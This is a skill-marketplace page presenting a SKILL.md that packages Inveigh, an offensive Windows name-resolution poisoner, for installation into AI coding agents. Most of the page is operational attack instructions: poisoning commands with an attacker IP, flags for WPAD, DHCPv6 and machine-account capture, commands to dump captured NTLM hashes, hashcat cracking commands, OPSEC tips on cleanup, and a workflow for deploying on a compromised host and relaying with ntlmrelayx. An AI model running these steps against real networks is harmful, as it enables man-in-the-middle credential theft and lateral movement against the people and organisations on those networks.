aeondave/inveigh
offensive-tools/windows/inveigh/SKILL.md
Windows .NET LLMNR/NBT-NS/mDNS/DNS poisoner and NTLM credential capture tool. Performs man-in-the-middle attacks by responding to broadcast name resolution requests and capturing NTLMv1/v2 hashes. Use when operating from a Windows host without access to Responder, when needing to capture NTLM hashes from network traffic, or when performing LLMNR/NBT-NS poisoning in AD environments.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill inveighInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: May 20, 2026, 3:49 AM55.2s1 file scanned
SKILL.md
- name:
- inveigh
- description:
- Windows .NET LLMNR/NBT-NS/mDNS/DNS poisoner and NTLM credential capture tool. Performs man-in-the-middle attacks by responding to broadcast name resolution requests and capturing NTLMv1/v2 hashes. Use when operating from a Windows host without access to Responder, when needing to capture NTLM hashes from network traffic, or when performing LLMNR/NBT-NS poisoning in AD environments.
- license:
- BSD-3-Clause
- compatibility:
- Windows (.NET 4.6.2+ for C# version, PowerShell 2.0+ for PS version). Run from domain-joined or non-domain host on the target network. Requires local admin for raw socket access.
- author:
- AeonDave
- version:
- 1.0
Inveigh
Windows-native LLMNR/NBT-NS/mDNS/DNS poisoner — capture NTLM hashes from a Windows host.
Quick Start
# PowerShell version — basic poisoning and capture
Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
# C# version (InveighZero) — more features
.\Inveigh.exe
PowerShell Module
Basic capture
Import-Module .\Inveigh.ps1
# Enable LLMNR + NBT-NS poisoning with console output
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
# Full options
Invoke-Inveigh -IP <attacker_ip> -LLMNR Y -NBNS Y -mDNS Y -ConsoleOutput Y -FileOutput Y -OutputDir C:\temp\
Interactive commands (while running)
Press ESC to enter interactive mode:
| Command | Description | |---------|-------------| | GET NTLMV1USERNAMES | List captured NTLMv1 users | | GET NTLMV2USERNAMES | List captured NTLMv2 users | | GET NTLMV1UNIQUE | Unique NTLMv1 hashes | | GET NTLMV2UNIQUE | Unique NTLMv2 hashes | | GET CLEARTEXT | Cleartext credentials | | HELP | Show all commands | | STOP | Stop Inveigh |
Stop and retrieve
Stop-Inveigh
# Get captured hashes
Get-Inveigh -NTLMv2
Get-Inveigh -NTLMv2Unique
Get-Inveigh -Cleartext
C# Version (InveighZero)
More modern, standalone executable. Preferred for operations.
# Basic run with defaults
.\Inveigh.exe
# Specify options
.\Inveigh.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y
Key flags
-FileOutput Y— write hashes to disk-NBNS Y— enable NBT-NS poisoning-mDNS Y— enable mDNS poisoning-Proxy Y— enable WPAD proxy capture-MachineAccounts Y— also capture machine account hashes-DHCPv6 Y— respond to DHCPv6 requests-LLMNRv6 Y— IPv6 LLMNR poisoning-Challenge <hex>— set custom NTLM challenge (for rainbow tables)
Cracking captured hashes
# NTLMv2 hashes (hashcat mode 5600)
hashcat -m 5600 inveigh_ntlmv2.txt /path/to/wordlist.txt
# NTLMv1 hashes (hashcat mode 5500)
hashcat -m 5500 inveigh_ntlmv1.txt /path/to/wordlist.txt
OPSEC considerations
- Noise level: MODERATE — responds to broadcast traffic only when requests occur
- Raw sockets require local admin privileges
- SMB server conflicts with Windows SMB service (port 445)
- Prefer targeting specific subnets/hosts to limit exposure
- Captured hashes logged in output directory — clean up after engagement
- Detection: unusual NBT-NS/LLMNR/mDNS responses from non-standard hosts
Comparison with Responder
| Feature | Inveigh | Responder | |---------|---------|-----------| | Platform | Windows | Linux | | Language | C#/.NET/PowerShell | Python | | LLMNR | Yes | Yes | | NBT-NS | Yes | Yes | | mDNS | Yes | Yes | | DHCPv6 | Yes | Yes | | WPAD | Yes | Yes | | SMB relay | No (use ntlmrelayx) | No (use ntlmrelayx) | | In-memory | Yes (PS version) | No |
Integration with AD workflow
- Deploy Inveigh on compromised Windows host
- Wait for NTLM hash captures (LLMNR/NBT-NS/mDNS)
- Crack NTLMv2 hashes offline (hashcat -m 5600)
- Or relay using ntlmrelayx (disable Inveigh SMB, relay to targets without SMB signing)
Resources
No bundled scripts/, references/, or assets/ are included in this skill. Use the PowerShell module help, InveighZero help output, and engagement-specific relay/cracking tooling as needed.
Related Skills
aeondave/offensive-linux-role
data-ai
VerifiedTrustedCommunity
Scoped routing: Linux operator; hosts, sessions, users, services, packages, logs, containers, SSH, network paths, privilege evidence.
4SKILL.mdUpdated Jun 5, 2026
aeondave/ics-technique
development
VerifiedTrustedCommunity
Offensive methodology for ICS/OT/SCADA environments in authorized industrial penetration testing and red team operations. Use when assessing PLCs, RTUs, HMIs, engineering workstations, historians, or field devices running Modbus, DNP3, EtherNet/IP, S7comm/S7+, Profinet, IEC 60870-5-104, BACnet, or OPC-UA. Covers passive OT network enumeration, protocol-level device interrogation, PLC coil/register read-write attacks, HMI session exploitation, historian and engineering workstation compromise, and safe escalation rules for critical infrastructure scope. Does not cover: general IT network exploitation (network-technique), physical hardware interfaces UART/JTAG/SPI (hardware-technique), wireless sensor network attacks (wireless-technique), RF/SDR signal analysis (hardware-ctf or wireless-technique), or CTF-framed ICS lab tasks (ics-ctf).
4SKILL.mdUpdated Jun 2, 2026
aeondave/game-technique
tools
VerifiedTrustedCommunity
Offensive methodology for authorized game security assessments, game client security research, and game-adjacent penetration testing in real-world engagements. Use when assessing game clients for cheating vulnerabilities, testing anti-cheat effectiveness, auditing game server protocols for score manipulation or economic fraud, reverse engineering game DRM or license validation, analyzing game save file protection, or assessing game mod/plugin security. Covers: process memory scanning and manipulation (Cheat Engine methodology), game binary reversing for license and DRM bypass, game network protocol analysis and packet replay, anti-cheat mechanism analysis, save file format reversing and tampering, speed hack and value injection techniques. Does NOT cover: CTF game challenges (game-ctf), game engine source code auditing (web-exploit-technique or vuln-search-technique for the backend), or general binary exploitation (pwn-ctf or reversing-technique).
4SKILL.mdUpdated Jun 2, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 2, 2026